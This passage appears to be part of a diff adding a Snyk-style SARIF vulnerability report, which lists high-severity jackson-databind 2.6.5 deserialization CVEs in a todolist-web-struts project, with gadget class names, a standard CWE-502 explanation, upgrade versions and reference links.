An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2642)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-10968) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to gadget `org.aoju.bus.proxy.provider.remoting.RmiProvider` (aka bus-proxy).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2662)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-11113) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.openjpa.ee.WASRegistryManagedRuntime` (aka openjpa).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2670)\n- [PoC](https://github.com/Al1ex/CVE-2020-11113)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-11111) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* 
Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to gadgets `org.apache.activemq.*` (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/c14c9f99ed030dbd1440129585f03440c8758a99)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2664)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-11112) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to gadget `org.apache.commons.proxy.provider.remoting.RmiProvider` (aka apache/commons-proxy).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GItHub Commit](https://github.com/FasterXML/jackson-databind/commit/05d7e0e13f43e12db6a51726df12c8b4d8040676)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2666)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-11620) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.jelly.impl.Embedded` (aka `commons-jelly`).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. 
Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2682)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-11619) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `org.springframework.aop.config.MethodLocatingFactoryBean` (aka `spring-aop`).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Issues](https://github.com/FasterXML/jackson-databind/issues/2680)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-14062) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: 
io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool` (`xalan2`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70)\n- [Github Issue](https://github.com/FasterXML/jackson-databind/issues/2704)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-14195) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
The package mishandles the interaction between serialization gadgets and typing, related to `org.jsecurity.realm.jndi.JndiRealmFactory`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/f6d9c664f6d481703138319f6a0f1fdbddb3a259)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2765)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-14060) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › 
